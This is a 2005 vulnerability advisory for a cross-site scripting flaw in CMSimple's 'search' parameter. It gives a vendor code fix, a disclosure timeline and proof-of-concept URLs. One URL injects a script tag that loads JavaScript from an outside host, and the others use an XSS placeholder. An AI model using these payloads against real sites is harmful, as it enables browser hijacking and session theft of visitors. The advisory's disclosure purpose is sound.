##############################################
CMSimple 'search' variable XSS
Vendor urL:http://www.cmsimple.dk/
Advisory:http://lostmon.blogspot.com/2005/07/
cmsimple-search-variable-xss.html
vendor fix:http://www.cmsimple.dk/
forum/viewtopic.php?t=2470
Vendor confirmed:YES exploit available:yes
OSVDB ID: 18128
Secunia: SA16147
BID: 14346
Securitytracker: 1014556
##############################################
CMSimple is a simple content management system; for the smart
maintenance of small commercial or private sites.
It is simple - small - smart!
CMSimple contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'search' variable upon submission to 'index.php' script.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.
Index.php file contains only a include to cmsimple/cms.php file.
#############
VERSIONS
#############
CMSimple 2.4 and earlier versions
#############
Solution
#############
vendor fix:
http://www.cmsimple.dk/forum/viewtopic.php?t=2470
Fix:
function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.$search;
should be replaced with:
function printlink(){global $f,$search,$file,$sn,$su,$tx;$t=amp().'print';if($f=='search')$t.=amp().'function=search'.amp().'search='.htmlspecialchars(stripslashes($search));
Will be fixed in next beta.
#############
Timeline
#############
discovered: 13-07-2005
vendor notify:20-07-2005
vendor response:21-07-2005
vendor fix:21-07-2005
disclosure:21-07-2005
################
Proof of concept
################
http://[victim]/index.php?&print&function=search&search="><script src="http://www.drorshalev.com/dev/injection/js.js"></script>
http://[victim]/?function=search&search=[XSS-CODE]
http://[victim]/?&print&function=search&search=[XSS-CODE]
http://[victim]/?License&function=search&search=[XSS-CODE]
http://[victim]/?Resellers&function=search&search=[XSS-CODE]
http://[victim]/?&guestbook&function=search&search=[XSS-CODE]
###################### €nd #########################
Thnx to estrella to be my ligth
thnx to http://www.drorshalev.com/ for hosting 'js.js' script
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
Subscribe to:
Posts (Atom)